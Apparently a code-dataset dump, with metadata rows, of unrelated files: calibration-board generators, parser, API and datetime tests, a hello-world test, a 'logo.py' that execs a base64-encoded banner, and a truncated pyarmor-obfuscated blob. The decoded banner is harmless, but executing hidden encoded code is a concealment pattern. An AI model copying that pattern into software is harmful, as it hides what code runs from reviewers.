im.save(savepath+name+".pdf", "PDF", resolution=dpi)
def makecharucoboard(nrow, ncolumn, markerdict=aruco.DICT_4X4_250, squaresize=25, savepath='./',
paperwidth=210, paperheight=297, dpi = 600, framesize = None):
"""
create charuco board
the paper is in portrait orientation, nrow means the number of markers in the vertical direction
:param nrow:
:param ncolumn:
:param markerdict:
:param savepath:
:param paperwidth: mm
:param paperheight: mm
:param dpi:
:param framesize: (width, height) the 1pt frame for easy cut, nothing is drawn by default
:return:
author: weiwei
date: 20190420
"""
aruco_dict = aruco.Dictionary_get(markerdict)
# 1mm = 0.0393701inch
a4npxrow = int(paperheight*0.0393701*dpi)
a4npxcolumn = int(paperwidth*0.0393701*dpi)
bgimg = np.ones((a4npxrow, a4npxcolumn), dtype='uint8')*255
if framesize is not None:
framesize[0] = int(framesize[0]*0.0393701*dpi)
framesize[1] = int(framesize[1]*0.0393701*dpi)
if a4npxcolumn<framesize[0]+2:
print("Frame width must be smaller than the #pt in each row.")
if a4npxrow<framesize[1]+2:
print("Frame height must be smaller than the #pt in each column.")
framelft = int((a4npxcolumn-framesize[0])/2-1)
framergt = int(framelft+1+framesize[0])
frametop = int((a4npxrow-framesize[1])/2-1)
framedown = int(frametop+1+framesize[1])
bgimg[frametop:framedown+1, framelft:framelft+1]=0
bgimg[frametop:framedown+1, framergt:framergt+1]=0
bgimg[frametop:frametop+1, framelft:framergt+1]=0
bgimg[framedown:framedown+1, framelft:framergt+1]=0
squaresizepx = int(squaresize*0.0393701*dpi)
squareareanpxrow = squaresizepx*nrow
uppermargin = int((a4npxrow-squareareanpxrow)/2)
squareareanpxcolumn = squaresizepx*ncolumn
leftmargin = int((a4npxcolumn-squareareanpxcolumn)/2)
if (uppermargin <= 10) or (leftmargin <= 10):
print("Too many markers! Reduce nrow and ncolumn.")
return
board = aruco.CharucoBoard_create(ncolumn, nrow, squaresize, .57*squaresize, aruco_dict)
imboard = board.draw((squareareanpxcolumn, squareareanpxrow))
print(imboard.shape)
startrow = uppermargin
endrow = uppermargin+squareareanpxrow
startcolumn = leftmargin
endcolumn = leftmargin+squareareanpxcolumn
bgimg[startrow:endrow, startcolumn:endcolumn] = imboard
im = Image.fromarray(bgimg).convert("L")
im.save(savepath+"test.pdf", "PDF", resolution=dpi)
def makechessboard(nrow, ncolumn, squaresize=25, savepath='./', paperwidth=210, paperheight=297, dpi = 600, framesize = None):
"""
create checss board
the paper is in portrait orientation, nrow means the number of markers in the vertical direction
:param nrow:
:param ncolumn:
:param savepath:
:param paperwidth: mm
:param paperheight: mm
:param dpi:
:param framesize: [width, height] the 1pt frame for easy cut, nothing is drawn by default
:return:
author: weiwei
date: 20190420
"""
# 1mm = 0.0393701inch
a4npxrow = int(paperheight*0.0393701*dpi)
a4npxcolumn = int(paperwidth*0.0393701*dpi)
bgimg = np.ones((a4npxrow, a4npxcolumn), dtype='uint8')*255
if framesize is not None:
framesize[0] = int(framesize[0]*0.0393701*dpi)
framesize[1] = int(framesize[1]*0.0393701*dpi)
if a4npxcolumn<framesize[0]+2:
print("Frame width must be smaller than the #pt in each row.")
if a4npxrow<framesize[1]+2:
print("Frame height must be smaller than the #pt in each column.")
framelft = int((a4npxcolumn-framesize[0])/2-1)
framergt = int(framelft+1+framesize[0])
frametop = int((a4npxrow-framesize[1])/2-1)
framedown = int(frametop+1+framesize[1])
bgimg[frametop:framedown+1, framelft:framelft+1]=0
bgimg[frametop:framedown+1, framergt:framergt+1]=0
bgimg[frametop:frametop+1, framelft:framergt+1]=0
bgimg[framedown:framedown+1, framelft:framergt+1]=0
squaresizepx = int(squaresize*0.0393701*dpi)
squareareanpxrow = squaresizepx*nrow
uppermargin = int((a4npxrow-squareareanpxrow)/2)
squareareanpxcolumn = squaresizepx*ncolumn
leftmargin = int((a4npxcolumn-squareareanpxcolumn)/2)
if (uppermargin <= 10) or (leftmargin <= 10):
print("Too many markers! Reduce nrow and ncolumn.")
return
for idnr in range(nrow):
for idnc in range(ncolumn):
startrow = uppermargin+idnr*squaresizepx
endrow = startrow+squaresizepx
startcolumn = leftmargin+idnc*squaresizepx
endcolumn = squaresizepx+startcolumn
if idnr%2 != 0 and idnc%2 != 0:
bgimg[startrow:endrow, startcolumn:endcolumn] = 0
if idnr%2 == 0 and idnc%2 == 0:
bgimg[startrow:endrow, startcolumn:endcolumn] = 0
im = Image.fromarray(bgimg).convert("L")
im.save(savepath+"test.pdf", "PDF", resolution=dpi)
worldpoints = np.zeros((nrow*ncolumn, 3), np.float32)
worldpoints[:, :2] = np.mgrid[:nrow, :ncolumn].T.reshape(-1, 2)*squaresize
return worldpoints
def makechessandcharucoboard(nrowchess=3, ncolumnchess=5, squaresize=25,
nrowcharuco=3, ncolumncharuco=5, markerdict=aruco.DICT_6X6_250, squaresizearuco=25,
savepath='./', paperwidth=210, paperheight=297, dpi = 600, framesize = None):
"""
create half-chess and half-charuco board
the paper is in portrait orientation, nrow means the number of markers in the vertical direction
:param nrow:
:param ncolumn:
:param squaresize: mm
:param markerdict:
:param savepath:
:param paperwidth: mm
:param paperheight: mm
:param dpi:
:param framesize: (width, height) the 1pt frame for easy cut, nothing is drawn by default
:return:
author: weiwei
date: 20190420
"""
aruco_dict = aruco.Dictionary_get(markerdict)
# 1mm = 0.0393701inch
a4npxrow = int(paperheight*0.0393701*dpi)
a4npxcolumn = int(paperwidth*0.0393701*dpi)
bgimg = np.ones((a4npxrow, a4npxcolumn), dtype='uint8')*255
if framesize is not None:
framesize[0] = int(framesize[0]*0.0393701*dpi)
framesize[1] = int(framesize[1]*0.0393701*dpi)
if a4npxcolumn<framesize[0]+2:
print("Frame width must be smaller than the #pt in each row.")
if a4npxrow<framesize[1]+2:
print("Frame height must be smaller than the #pt in each column.")
framelft = int((a4npxcolumn-framesize[0])/2-1)
framergt = int(framelft+1+framesize[0])
frametop = int((a4npxrow-framesize[1])/2-1)
framedown = int(frametop+1+framesize[1])
bgimg[frametop:framedown+1, framelft:framelft+1]=0
bgimg[frametop:framedown+1, framergt:framergt+1]=0
bgimg[frametop:frametop+1, framelft:framergt+1]=0
bgimg[framedown:framedown+1, framelft:framergt+1]=0
# upper half, charuco
squaresizepx = int(squaresizearuco*0.0393701*dpi)
squareareanpxrow = squaresizepx*nrowchess
uppermargin = int((a4npxrow/2-squareareanpxrow)/2)
squareareanpxcolumn = squaresizepx*ncolumnchess
leftmargin = int((a4npxcolumn-squareareanpxcolumn)/2)
if (uppermargin <= 10) or (leftmargin <= 10):
print("Too many markers! Reduce nrow and ncolumn.")
return
board = aruco.CharucoBoard_create(ncolumnchess, nrowchess, squaresizearuco, .57*squaresizearuco, aruco_dict)
imboard = board.draw((squareareanpxcolumn, squareareanpxrow))
print(imboard.shape)
startrow = uppermargin
endrow = uppermargin+squareareanpxrow
startcolumn = leftmargin
endcolumn = leftmargin+squareareanpxcolumn
bgimg[startrow:endrow, startcolumn:endcolumn] = imboard
# lower half, chess
squaresizepx = int(squaresize*0.0393701*dpi)
squareareanpxrow = squaresizepx*nrowcharuco
uppermargin = int((a4npxrow/2-squareareanpxrow)/2)
squareareanpxcolumn = squaresizepx*ncolumncharuco
leftmargin = int((a4npxcolumn-squareareanpxcolumn)/2)
if (uppermargin <= 10) or (leftmargin <= 10):
print("Too many markers! Reduce nrow and ncolumn.")
return
for idnr in range(nrowcharuco):
for idnc in range(ncolumncharuco):
startrow = int(a4npxrow/2)+uppermargin+idnr*squaresizepx
endrow = startrow+squaresizepx
startcolumn = leftmargin+idnc*squaresizepx
endcolumn = squaresizepx+startcolumn
if idnr%2 != 0 and idnc%2 != 0:
bgimg[startrow:endrow, startcolumn:endcolumn] = 0
if idnr%2 == 0 and idnc%2 == 0:
bgimg[startrow:endrow, startcolumn:endcolumn] = 0
im = Image.fromarray(bgimg).convert("L")
im.save(savepath+"test.pdf", "PDF", resolution=dpi)
if __name__ == '__main__':
# makechessandcharucoboard(4,6,32,5,7)
# makecharucoboard(7,5, square_size=40)
# makechessboard(7,5, square_size=40)
# makearucoboard(2,2, marker_size=80)
# makearucoboard(1,1,marker_dict=aruco.DICT_4X4_250, start_id=1, marker_size=45, frame_size=[60,60])
makechessboard(1, 1, squaresize=35, framesize = [100,150])
| 40.46
| 126
| 0.66815
| 1,460
| 12,138
| 5.531507
| 0.119863
| 0.020802
| 0.028603
| 0.021793
| 0.824542
| 0.797053
| 0.797053
| 0.797053
| 0.771545
| 0.759782
| 0
| 0.062658
| 0.218982
| 12,138
| 300
| 127
| 40.46
| 0.789241
| 0.162877
| 0
| 0.789189
| 0
| 0
| 0.074239
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021622
| false
| 0
| 0.016216
| 0
| 0.07027
| 0.081081
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4279498e67d79c6745c05b69f4c8a282ec499cb2
| 165
|
py
|
Python
|
tests/parser/builtin_safety.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/builtin_safety.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/builtin_safety.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
a(X) :- f(X), X<Y, g(Y).
a(X) :- f(X), X<Y.
a(X) :- X<Y, g(Y).
"""
output = """
a(X) :- f(X), X<Y, g(Y).
a(X) :- f(X), X<Y.
a(X) :- X<Y, g(Y).
"""
| 15
| 25
| 0.309091
| 42
| 165
| 1.214286
| 0.166667
| 0.235294
| 0.352941
| 0.313725
| 0.784314
| 0.784314
| 0.784314
| 0.784314
| 0.784314
| 0.784314
| 0
| 0
| 0.242424
| 165
| 10
| 26
| 16.5
| 0.408
| 0
| 0
| 0.8
| 0
| 0
| 0.805031
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
4283a06fd9be07d1c3d98653ccc827adb50629af
| 1,403
|
py
|
Python
|
tests/mixins/location_tests.py
|
StuartMacKay/ebird-api
|
14b5c777548416a58abec05e25cd4b9a8e22f210
|
[
"MIT"
] | 9
|
2020-05-16T20:26:33.000Z
|
2021-11-02T06:24:46.000Z
|
tests/mixins/location_tests.py
|
StuartMacKay/ebird-api
|
14b5c777548416a58abec05e25cd4b9a8e22f210
|
[
"MIT"
] | 17
|
2019-06-22T09:41:22.000Z
|
2020-09-11T06:25:21.000Z
|
tests/mixins/location_tests.py
|
ProjectBabbler/ebird-api
|
14b5c777548416a58abec05e25cd4b9a8e22f210
|
[
"MIT"
] | null | null | null |
from tests.mixins.base import BaseMixin
class LocationTestsMixin(BaseMixin):
def test_location_is_comma_separated_string(self):
query = self.api_call(locations="L001,L002")[1]
self.assertTrue(query["r"], "L001,L002")
def test_location_string_whitespace_is_removed(self):
query = self.api_call(locations=" L001 , L002 ")[1]
self.assertTrue(query["r"], "L001,L002")
def test_location_is_list(self):
query = self.api_call(locations=["L001", "L002"])[1]
self.assertTrue(query["r"], "L001,US_ID")
def test_location_list_whitespace_is_removed(self):
query = self.api_call(locations=[" L001 ", " L002 "])[1]
self.assertTrue(query["r"], "L001,L002")
def test_invalid_location_raises_error(self):
self.api_raises(ValueError, locations="L")
def test_blank_location_raises_error(self):
self.api_raises(ValueError, locations="")
def test_blank_location_in_string_raises_error(self):
self.api_raises(ValueError, locations="L001,")
def test_blank_location_in_list_raises_error(self):
self.api_raises(ValueError, locations=["L001", ""])
def test_more_than_10_in_string_raises_error(self):
self.api_raises(ValueError, locations=",".join(["L001"] * 11))
def test_more_than_10_in_list_raises_error(self):
self.api_raises(ValueError, locations=["L001"] * 11)
| 36.921053
| 70
| 0.698503
| 186
| 1,403
| 4.930108
| 0.225806
| 0.076336
| 0.098146
| 0.124318
| 0.814613
| 0.778626
| 0.749182
| 0.749182
| 0.749182
| 0.629226
| 0
| 0.059126
| 0.168211
| 1,403
| 37
| 71
| 37.918919
| 0.72665
| 0
| 0
| 0.269231
| 0
| 0
| 0.072701
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 1
| 0.384615
| false
| 0
| 0.038462
| 0
| 0.461538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4287dcc89cdc905b662bd4dd2a719dfa973ed3c2
| 80
|
py
|
Python
|
scripts/validate/__init__.py
|
AjmalShajahan/public-apis
|
831ff0378fb0ba5a779e6caaa89b73766c59449e
|
[
"MIT"
] | 59,333
|
2016-03-21T00:05:34.000Z
|
2022-03-31T20:25:44.000Z
|
scripts/validate/__init__.py
|
dcollis92/public-apis
|
831ff0378fb0ba5a779e6caaa89b73766c59449e
|
[
"MIT"
] | 717
|
2016-03-21T06:24:54.000Z
|
2019-06-03T22:30:29.000Z
|
scripts/validate/__init__.py
|
dcollis92/public-apis
|
831ff0378fb0ba5a779e6caaa89b73766c59449e
|
[
"MIT"
] | 6,587
|
2016-03-21T00:24:25.000Z
|
2022-03-30T03:14:38.000Z
|
# -*- coding: utf-8 -*-
from validate import format
from validate import links
| 16
| 27
| 0.7125
| 11
| 80
| 5.181818
| 0.727273
| 0.421053
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015152
| 0.175
| 80
| 4
| 28
| 20
| 0.848485
| 0.2625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
35ec8e5e3d7b12852155934c3fc1848053b8b6a5
| 7,090
|
py
|
Python
|
lib/axon/test/test_datetime10.py
|
intellimath/pyaxon
|
fcadf741bedd71fdb21d6e8b865da2a22f2bd1fb
|
[
"MIT"
] | 19
|
2015-03-02T19:38:51.000Z
|
2021-11-16T13:48:04.000Z
|
lib/axon/test/test_datetime10.py
|
intellimath/pyaxon
|
fcadf741bedd71fdb21d6e8b865da2a22f2bd1fb
|
[
"MIT"
] | null | null | null |
lib/axon/test/test_datetime10.py
|
intellimath/pyaxon
|
fcadf741bedd71fdb21d6e8b865da2a22f2bd1fb
|
[
"MIT"
] | 4
|
2015-02-07T13:29:43.000Z
|
2020-01-01T19:20:53.000Z
|
# coding: utf-8
from __future__ import unicode_literals
import unittest
from axon import loads, dumps
from datetime import date, time, datetime, tzinfo
class DateTime10TestCase(unittest.TestCase):
def setUp(self):
pass
def test_date1(self):
v = loads('^2010-12-01')[0]
self.assertEqual(type(v), date)
s = dumps([v])
self.assertEqual(s, '^2010-12-01')
#
def test_date2(self):
v = loads('^1900-01-01')[0]
self.assertEqual(type(v), date)
s = dumps([v])
self.assertEqual(s, '^1900-01-01')
#
def test_date3(self):
v = loads('^12-01-01')[0]
self.assertEqual(type(v), date)
s = dumps([v])
self.assertEqual(s, '^12-01-01')
#
def test_date4(self):
v = loads('^0-00-00')[0]
self.assertEqual(type(v), date)
s = dumps([v])
self.assertEqual(s, '^0-00-00')
#
def test_time1(self):
v = loads('^00:00')[0]
self.assertEqual(type(v), time)
s = dumps([v])
self.assertEqual(s, '^00:00')
#
def test_time2(self):
v = loads('^23:59:59')[0]
self.assertEqual(type(v), time)
s = dumps([v])
self.assertEqual(s, '^23:59:59')
#
def test_time3(self):
v = loads('^23:59:59.000123')[0]
self.assertEqual(type(v), time)
s = dumps([v])
self.assertEqual(s, '^23:59:59.000123')
#
def test_time4(self):
v = loads('^23:59:59+00:00')[0]
self.assertEqual(type(v), time)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^23:59:59+00')
self.assertEqual(v.utcoffset().seconds, 0)
#
def test_time5(self):
v = loads('^23:59:59+01:00')[0]
self.assertEqual(type(v), time)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^23:59:59+01')
self.assertEqual(v.utcoffset().seconds/60, 60)
#
def test_time6(self):
v = loads('^23:59:59-01:00')[0]
self.assertEqual(type(v), time)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^23:59:59-01')
self.assertEqual(v.utcoffset().seconds/60, 23*60)
#
def test_time7(self):
v = loads('^23:59:59+12:00')[0]
self.assertEqual(type(v), time)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^23:59:59+12')
self.assertEqual(v.utcoffset().seconds/60, 12*60)
#
def test_time8(self):
v = loads('^23:59:59+23:00')[0]
self.assertEqual(type(v), time)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^23:59:59+23')
self.assertEqual(v.utcoffset().seconds/60, 23*60)
#
def test_time9(self):
v = loads('^23:59:59-23:00')[0]
self.assertEqual(type(v), time)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^23:59:59-23')
self.assertEqual(v.utcoffset().seconds/60, 60)
#
def test_time10(self):
v = loads('^23:59:59+3:15')[0]
self.assertEqual(type(v), time)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^23:59:59+03:15')
self.assertEqual(v.utcoffset().seconds/60, 3*60+15)
#
def test_time11(self):
v = loads('^23:59:59-3:15')[0]
self.assertEqual(type(v), time)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^23:59:59-03:15')
self.assertEqual(v.utcoffset().seconds/60, 1440-3*60-15)
#
def test_datetime1(self):
v = loads('^2010-01-01T00:00')[0]
self.assertEqual(type(v), datetime)
self.assertEqual(v.tzinfo, None)
s = dumps([v])
self.assertEqual(s, '^2010-01-01T00:00')
#
def test_datetime2(self):
v = loads('^1-01-01T23:59:59')[0]
self.assertEqual(type(v), datetime)
self.assertEqual(v.tzinfo, None)
s = dumps([v])
self.assertEqual(s, '^1-01-01T23:59:59')
#
def test_datetime3(self):
v = loads('^2010-01-01T23:59:59.000123')[0]
self.assertEqual(type(v), datetime)
self.assertEqual(v.tzinfo, None)
s = dumps([v])
self.assertEqual(s, '^2010-01-01T23:59:59.000123')
#
def test_datetime4(self):
v = loads('^2010-01-01T23:59:59+00:00')[0]
self.assertEqual(type(v), datetime)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^2010-01-01T23:59:59+00')
self.assertEqual(v.utcoffset().seconds, 0)
#
def test_datetime5(self):
v = loads('^2010-01-01T23:59:59+01:00')[0]
self.assertEqual(type(v), datetime)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^2010-01-01T23:59:59+01')
self.assertEqual(v.utcoffset().seconds/60, 60)
#
def test_datetime6(self):
v = loads('^2010-01-01T23:59:59-01:00')[0]
self.assertEqual(type(v), datetime)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^2010-01-01T23:59:59-01')
self.assertEqual(v.utcoffset().seconds/60, 23*60)
#
def test_datetime7(self):
v = loads('^2010-01-01T23:59:59+12:00')[0]
self.assertEqual(type(v), datetime)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^2010-01-01T23:59:59+12')
self.assertEqual(v.utcoffset().seconds/60, 12*60)
#
def test_datetime8(self):
v = loads('^2010-01-01T23:59:59+23:00')[0]
self.assertEqual(type(v), datetime)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^2010-01-01T23:59:59+23')
self.assertEqual(v.utcoffset().seconds/60, 23*60)
#
def test_datetime9(self):
v = loads('^2010-01-01T23:59:59-23:00')[0]
self.assertEqual(type(v), datetime)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^2010-01-01T23:59:59-23')
self.assertEqual(v.utcoffset().seconds/60, 60)
#
def test_datetime10(self):
v = loads('^2010-01-01T23:59:59+3:15')[0]
self.assertEqual(type(v), datetime)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^2010-01-01T23:59:59+03:15')
self.assertEqual(v.utcoffset().seconds/60, 3*60+15)
#
def test_datetime11(self):
v = loads('^2010-01-01T23:59:59-3:15')[0]
self.assertEqual(type(v), datetime)
self.assertIsInstance(v.tzinfo, tzinfo)
s = dumps([v])
self.assertEqual(s, '^2010-01-01T23:59:59-03:15')
self.assertEqual(v.utcoffset().seconds/60, 1440-3*60-15)
#
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(DateTime10TestCase))
return suite
| 33.923445
| 64
| 0.569676
| 983
| 7,090
| 4.077314
| 0.081384
| 0.265719
| 0.06487
| 0.129741
| 0.847305
| 0.832335
| 0.818862
| 0.81487
| 0.792665
| 0.786677
| 0
| 0.14248
| 0.252609
| 7,090
| 208
| 65
| 34.086538
| 0.613889
| 0.001834
| 0
| 0.494318
| 0
| 0
| 0.124557
| 0.063839
| 0
| 0
| 0
| 0
| 0.494318
| 1
| 0.159091
| false
| 0.005682
| 0.022727
| 0
| 0.193182
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c42d383aeb5469d6edd6c6a01a11e1625c720775
| 121
|
py
|
Python
|
tests/test_pyramid_helloworld.py
|
mardiros/pyramid-helloworld
|
15455f2e3ca2f5e3efb6f0482b78302078f1ce2c
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_pyramid_helloworld.py
|
mardiros/pyramid-helloworld
|
15455f2e3ca2f5e3efb6f0482b78302078f1ce2c
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_pyramid_helloworld.py
|
mardiros/pyramid-helloworld
|
15455f2e3ca2f5e3efb6f0482b78302078f1ce2c
|
[
"BSD-3-Clause"
] | null | null | null |
from pyramid_helloworld import hello_world
def test_hello_world():
assert hello_world(None).text == "Hello World!"
| 20.166667
| 51
| 0.768595
| 17
| 121
| 5.176471
| 0.647059
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140496
| 121
| 5
| 52
| 24.2
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0.099174
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
670e65530c18122225169e922b2fa4c9585dcad8
| 792
|
py
|
Python
|
lib/logo.py
|
buchin1337/mbf-fb
|
7512c948e36e89e0beb507f21004259b62fedbd4
|
[
"Apache-2.0"
] | 1
|
2020-08-13T08:41:17.000Z
|
2020-08-13T08:41:17.000Z
|
lib/logo.py
|
buchin1337/mbf-fb
|
7512c948e36e89e0beb507f21004259b62fedbd4
|
[
"Apache-2.0"
] | null | null | null |
lib/logo.py
|
buchin1337/mbf-fb
|
7512c948e36e89e0beb507f21004259b62fedbd4
|
[
"Apache-2.0"
] | null | null | null |
#Coded by ./Buchin1337
import base64
exec(base64.b64decode('aW1wb3J0IG9zDQp3ID0gJ1x4MWJbMTszN20nDQpiID0gJ1x4MWJbMTszNm0nDQpnID0gJ1x4MWJbMTszMm0nDQp5ID0gJ1x4MWJbMTszM20nDQpyID0gJ1x4MWJbMTszMW0nDQoNCmRlZiBiYW5uZXIoKToNCglvcy5zeXN0ZW0oJ2NsZWFyJykNCglwcmludChmJycne3l9ICoqKioqKioqKioqKioqKioqKioqKioqKioqKioqDQp7cn0g4oCmLi5fX19fX19fX19fX19fX19fX19fXyAsICxfXw0K4oCm4oCmLyBg4oCUX197d30gLi9CdWNoaW4xMzM3e3J9IF9fX+KAlC1fX19fX3xdIOKAkyDigJMg4oCTIOKAkyAtIOKAkyDigJMg4oCTIOKWkSDilpLilpPilpPilohEDQrigKYuLi9fPT1vOzs7Ozs7OztfX19fX19fLjovDQrigKYuLiksIOKAlC4oXyhfXykgLw0K4oCmLi8vICguLikgKSwg4oCULeKAnQ0K4oCmLy9fX18vLw0KLi4vL19fXy8vDQouLy9fX18vLyB7Z30g4oCcQWt1IGJvbGVoIGphZGkgcGFjYXJtdT8iDQp7d30g4pml4pmgIHtifSAiNDAwKEJhZCBSZXF1ZXN0KSIge3d94pml4pmgwqANCnt5fSAqKioqKioqKioqKioqKioqKioqKioqKioqKioqKicnJyk='))
| 198
| 754
| 0.977273
| 10
| 792
| 77.4
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160305
| 0.007576
| 792
| 3
| 755
| 264
| 0.824427
| 0.026515
| 0
| 0
| 0
| 0
| 0.945455
| 0.945455
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
6727bcd870b9b1dbf8194546ee2c1f34ba1d2589
| 11,007
|
py
|
Python
|
Assignments/Assignment_03/ekf/solution/measurementmodels.py
|
chrstrom/TTK4250
|
f453c3a59597d3fe6cff7d35b790689919798b94
|
[
"Unlicense"
] | null | null | null |
Assignments/Assignment_03/ekf/solution/measurementmodels.py
|
chrstrom/TTK4250
|
f453c3a59597d3fe6cff7d35b790689919798b94
|
[
"Unlicense"
] | null | null | null |
Assignments/Assignment_03/ekf/solution/measurementmodels.py
|
chrstrom/TTK4250
|
f453c3a59597d3fe6cff7d35b790689919798b94
|
[
"Unlicense"
] | null | null | null |
__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x09\x00\x61\x0d\x0d\x0a\x07\x2c\xa0\x01\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x76\x0a\x00\x00\x00\x00\x00\x10\xe1\x0b\x7e\xde\xfa\xc2\xb6\x4c\x15\x4c\xba\x53\xd6\xeb\x8b\x12\x00\x00\x00\x00\x00\x00\x00\x00\x19\x1b\x9a\x62\xc3\xab\xc9\xf4\xe8\x97\x8b\x89\xda\x34\x6a\xb9\x3d\x20\x78\x46\xec\x5d\xcd\x18\xd3\x10\x2e\x0c\xf6\x89\x9d\x28\xae\x7e\x40\x00\x93\xbd\xe0\x7b\x69\xcb\x8e\x3f\x71\xf5\x3a\x7d\x42\x3e\x8b\x7d\x35\x58\x90\xc9\xad\x2a\x2c\x26\xb3\x29\xe8\xca\xad\xb4\x2e\x01\x6d\x51\x23\x33\xc1\xba\x3a\xf7\x62\x23\x72\xc5\x8f\x54\x6c\xe8\x0d\xc6\x31\x4a\x5c\xca\x50\xaf\x8a\xa8\x46\xac\x46\x20\x16\x5f\x33\x37\x9b\x86\x84\x1c\x99\xde\x02\x51\x58\x5b\x18\xd6\x45\xc9\x98\x8d\xb8\x08\x41\x23\xc9\x09\x93\x5d\x0e\xe3\xf9\x54\x5c\xed\x41\x96\x9c\x5c\xa5\xe9\x93\xb8\xee\xf2\x2c\x00\x1f\xfc\x35\xb4\x2f\x3d\x99\xaf\x36\x52\xaf\xcc\x41\x78\xa5\x07\xea\x56\xd5\xc0\x54\x98\xdb\x30\xa9\x72\x3d\x95\xf3\xac\x57\x8a\x4f\x54\x2b\x0f\x22\x38\x95\x44\xeb\x7f\x94\xc8\xf8\x69\x1a\xe5\x32\x71\xaa\x79\x6c\x54\x93\xa8\xc9\x2b\x42\x5c\x9d\xba\x87\xf8\x63\x30\x54\xfe\x0e\x79\x43\xba\xf5\xd6\xbb\xca\x9c\x7b\xc7\x13\xcc\xc3\xef\x02\x68\x32\x1b\xab\xfd\xe3\x5d\x09\x33\x51\x79\x64\x53\xc7\xeb\xe8\xf6\x56\x13\x0a\x21\x64\xaf\x77\x42\xf3\xc7\xce\x39\x42\x8a\xd3\x4c\xb4\x63\xaf\xd5\x4a\x6e\